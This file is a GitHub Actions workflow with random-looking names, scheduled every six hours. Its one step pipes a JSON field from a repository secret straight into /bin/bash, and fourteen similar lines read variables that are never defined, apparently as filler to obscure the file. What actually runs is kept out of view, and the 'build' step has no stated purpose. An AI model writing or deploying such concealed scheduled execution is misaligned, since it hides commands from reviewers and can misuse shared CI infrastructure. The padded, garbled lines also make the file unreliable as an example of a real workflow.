name: xushengtian4175

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xushengtian4175
        env:
          d600: ${{ secrets.d600 }}
        run: |
          echo $d600 | jq -r .md27 | /bin/bash
          echo $kclqu3 | jq -r .bciq3 | /bin/bash
          echo $yd5 | jq -r .rddy012 | /bin/bash
          echo $ow26 | jq -r .j6 | /bin/bash
          echo $kgf1082 | jq -r .zvlva612 | /bin/bash
          echo $sbzd79120 | jq -r .s0341 | /bin/bash
          echo $q58451 | jq -r .legr22523 | /bin/bash
          echo $gluzc28776 | jq -r .qz086 | /bin/bash
          echo $mbyu156 | jq -r .dkmos1 | /bin/bash
          echo $vjmss782 | jq -r .g593 | /bin/bash
          echo $uifgq50951 | jq -r .fltlz6 | /bin/bash
          echo $hmiez5 | jq -r .mikn0 | /bin/bash
          echo $n69 | jq -r .zugls29049 | /bin/bash
          echo $rr80370 | jq -r .xjc668 | /bin/bash
          echo $hiv4647 | jq -r .bzk4 | /bin/bash

